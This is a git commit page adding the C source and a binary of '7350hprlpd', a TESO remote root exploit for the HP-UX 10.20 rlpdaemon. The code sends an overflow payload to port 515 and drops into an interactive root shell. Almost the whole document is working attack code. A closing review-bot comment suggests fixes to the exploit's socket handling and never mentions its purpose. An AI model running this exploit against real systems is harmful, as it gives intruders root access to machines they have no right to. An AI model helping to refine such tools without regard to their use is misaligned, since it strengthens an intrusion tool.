authorRoot THC2026-02-24 12:42:47 +0000
committerRoot THC2026-02-24 12:42:47 +0000
commitc9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
treeaefc355416b561111819de159ccbd86c3004cf88 /exploits/7350hprlpd
parent073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
initial
Diffstat (limited to 'exploits/7350hprlpd')
-rw-r--r--exploits/7350hprlpd/7350hprlpdbin0 -> 30064 bytes
-rw-r--r--exploits/7350hprlpd/7350hprlpd.c345
2 files changed, 345 insertions, 0 deletions
diff --git a/exploits/7350hprlpd/7350hprlpd b/exploits/7350hprlpd/7350hprlpd
new file mode 100644
index 0000000..d2b3183
--- /dev/null
+++ b/exploits/7350hprlpd/7350hprlpd
Binary files differ
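--- /dev/null
+++ b/exploits/7350hprlpd/7350hprlpd.c
@@ -0,0 +1,345 @@
+/* 7350hprlpd - hppa/hpux rlpdaemon remote root exploit
+ *
+ * TESO CONFIDENTIAL - SOURCE MATERIALS
+ *
+ * This is unpublished proprietary source code of TESO Security.
+ *
+ * The contents of these coded instructions, statements and computer
+ * programs may not be disclosed to third parties, copied or duplicated in
+ * any form, in whole or in part, without the prior written permission of
+ * TESO Security. This includes especially the Bugtraq mailing list, the
+ * www.hack.co.za website and any public exploit archive.
+ *
+ * (C) COPYRIGHT TESO Security, 2001
+ * All Rights Reserved
+ *
+ *****************************************************************************
+ * bug published by ISS x-force 2001/08/27
+ *
+ *
+ */
+
+#define VERSION "0.0.1"
+
+#include <sys/types.h>
+#include <sys/time.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <arpa/telnet.h>
+#include <netdb.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+
+
+void usage (char *progname);
+void xp (int fd);
+void shell (int sock);
+
+/* imported from network.c */
+#define NET_CONNTIMEOUT 60
+int net_conntimeout = NET_CONNTIMEOUT;
+
+
+unsigned long int net_resolve (char *host);
+int net_connect (struct sockaddr_in *cs, char *server,
+ unsigned short int port, int sec);
+
+
+typedef struct {
+ char * desc;
+
+ int bsize;
+ int align;
+
+ int ret_pos;
+ unsigned long int ret_addr;
+
+ unsigned long int code_addr;
+} t_elem;
+
+t_elem targets[] = {
+ { "HP-UX 10.20", 1100, 3, 100, 0x7b03bff8, 0x30303030 },
+ { NULL, 0, 0, 0, 0, 0 },
+};
+
+//unsigned char * shellcode = x86_bsd_compaexec;
+
+#define SHELL_INIT_STR "unset HISTFILE;uname -a;id;pwd;\n"
+
+
+void
+usage (char *progname)
+{
+ fprintf (stderr, "usage: %s <ip>\n\n", progname);
+ fprintf (stderr, "-n num\tnumber of populators, for testing purposes\n"
+ "-c\tcheck exploitability only, do not exploit\n"
+ "-f\tforce mode, override check results\n\n");
+
+ exit (EXIT_FAILURE);
+}
+
+
+int
+main (int argc, char *argv[])
+{
+ int fd;
+ char c;
+ char * progname;
+ char * dest;
+
+
+ fprintf (stderr, "7350hprlpd - hppa/hpux rlpdaemon remote root\n"
+ "by scut.\n\n");
+
+ progname = argv[0];
+ if (argc < 2)
+ usage (progname);
+
+
+#if 0
+ while ((c = getopt (argc, argv, "n:cf")) != EOF) {
+ switch (c) {
+ case 'n':
+ num = atoi (optarg);
+ break;
+ case 'c':
+ checkonly = 1;
+ break;
+ case 'f':
+ force = 1;
+ break;
+ default:
+ usage (progname);
+ break;
+ }
+ }
+#endif
+
+ dest = argv[argc - 1];
+ if (dest[0] == '-')
+ usage (progname);
+
+ fd = net_connect (NULL, dest, 515, 20);
+ if (fd <= 0) {
+ fprintf (stderr, "failed to connect\n");
+ exit (EXIT_FAILURE);
+ }
+
+#ifdef DEBUG
+ getchar ();
+#endif
+ xp (fd);
+ sleep (15);
+/*XXX*/ exit (EXIT_SUCCESS);
+
+ printf ("## ok, you should now have a root shell\n");
+ printf ("##\n");
+
+ fflush (stdout);
+
+ write (fd, SHELL_INIT_STR, strlen (SHELL_INIT_STR));
+ shell (fd);
+
+ exit (EXIT_SUCCESS);
+}
+
+
+void
+xp (int fd)
+{
+ int n;
+ unsigned char buf[2048];
+
+
+ /* first request */
+ memset (buf, '\x00', sizeof (buf));
+
+ n = 0;
+ buf[n++] = '\6';
+ buf[n++] = '\n';
+ buf[n++] = '\0';
+
+ send (fd, buf, strlen (buf), 0);
+ sleep (1);
+
+
+ /* second request */
+ memset (buf, '\x00', sizeof (buf));
+
+ n = 0;
+ buf[n++] = '\6';
+
+ memset (&buf[n], 'A', 1051);
+ n += strlen (&buf[n]);
+
+ buf[n++] = '\x00';
+ buf[n++] = '\x00';
+ buf[n++] = '\x8c';
+ buf[n++] = '\xa3';
+
+ buf[n++] = '\xc0';
+ buf[n++] = '\x13';
+ buf[n++] = '\xd2';
+ buf[n++] = '\x03';
+
+ for ( ; n < 2000 ; ++n)
+ buf[n] = '0';
+
+ buf[n++] = '\n';
+ buf[n++] = '\0';
+
+ n = send (fd, buf, n, 0);
+}
+
+
+void
+shell (int sock)
+{
+ int l;
+ char buf[512];
+ fd_set rfds;
+
+
+ while (1) {
+ FD_SET (0, &rfds);
+ FD_SET (sock, &rfds);
+
+ select (sock + 1, &rfds, NULL, NULL, NULL);
+ if (FD_ISSET (0, &rfds)) {
+ l = read (0, buf, sizeof (buf));
+ if (l <= 0) {
+ perror ("read user");
+ exit (EXIT_FAILURE);
+ }
+ write (sock, buf, l);
+ }
+
+ if (FD_ISSET (sock, &rfds)) {
+ l = read (sock, buf, sizeof (buf));
+ if (l <= 0) {
+ perror ("read remote");
+ exit (EXIT_FAILURE);
+ }
+ write (1, buf, l);
+ }
+ }
+}
+
+
+unsigned long int
+net_resolve (char *host)
+{
+ long i;
+ struct hostent *he;
+
+ i = inet_addr(host);
+ if (i == -1) {
+ he = gethostbyname(host);
+ if (he == NULL) {
+ return (0);
+ } else {
+ return (*(unsigned long *) he->h_addr);
+ }
+ }
+ return (i);
+}
+
+
+int
+net_connect (struct sockaddr_in *cs, char *server,
+ unsigned short int port, int sec)
+{
+ int n,
+ len,
+ error,
+ flags;
+ int fd;
+ struct timeval tv;
+ fd_set rset, wset;
+ struct sockaddr_in csa;
+
+ if (cs == NULL)
+ cs = &csa;
+
+ /* first allocate a socket */
+ cs->sin_family = AF_INET;
+ cs->sin_port = htons (port);
+ fd = socket (cs->sin_family, SOCK_STREAM, 0);
+ if (fd == -1)
+ return (-1);
+
+ if (!(cs->sin_addr.s_addr = net_resolve (server))) {
+ close (fd);
+ return (-1);
+ }
+
+ flags = fcntl (fd, F_GETFL, 0);
+ if (flags == -1) {
+ close (fd);
+ return (-1);
+ }
+ n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
+ if (n == -1) {
+ close (fd);
+ return (-1);
+ }
+
+ error = 0;
+
+ n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
+ if (n < 0) {
+ if (errno != EINPROGRESS) {
+ close (fd);
+ return (-1);
+ }
+ }
+ if (n == 0)
+ goto done;
+
+ FD_ZERO(&rset);
+ FD_ZERO(&wset);
+ FD_SET(fd, &rset);
+ FD_SET(fd, &wset);
+ tv.tv_sec = sec;
+ tv.tv_usec = 0;
+
+ n = select(fd + 1, &rset, &wset, NULL, &tv);
+ if (n == 0) {
+ close(fd);
+ errno = ETIMEDOUT;
+ return (-1);
+ }
+ if (n == -1)
+ return (-1);
+
+ if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
+ if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
+ len = sizeof(error);
+ if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
+ errno = ETIMEDOUT;
+ return (-1);
+ }
+ if (error == 0) {
+ goto done;
+ } else {
+ errno = error;
+ return (-1);
+ }
+ }
+ } else
+ return (-1);
+
+done:
+ n = fcntl(fd, F_SETFL, flags);
+ if (n == -1)
+ return (-1);
+ return (fd);
+}
+
+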
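Review bot: net_connect() leaks the socket on every failure path after the select() call — the `n == -1` return at line 319, the getsockopt() failure at 326, the `error != 0` branch at 332, the trailing `else return (-1);` at 336 and the fcntl() restore failure at 341 all return without `close (fd)`, whereas every earlier failure path in the same function does close it. Each of those returns should be preceded by a close, ordered so the reported errno survives, e.g. at 331-332 `close (fd); errno = error; return (-1);` and for the select()/fcntl() failures `int saved = errno; close (fd); errno = saved; return (-1);`. The comment at line 44 says this helper is imported from network.c, so the same leak presumably exists in the shared copy and is worth fixing there too. Separately, net_resolve() at line 247 reads `*(unsigned long *) he->h_addr`, which on an LP64 build reads 8 bytes from a 4-byte in_addr and violates strict aliasing; copying into an `in_addr_t` with memcpy() and returning that is the portable form.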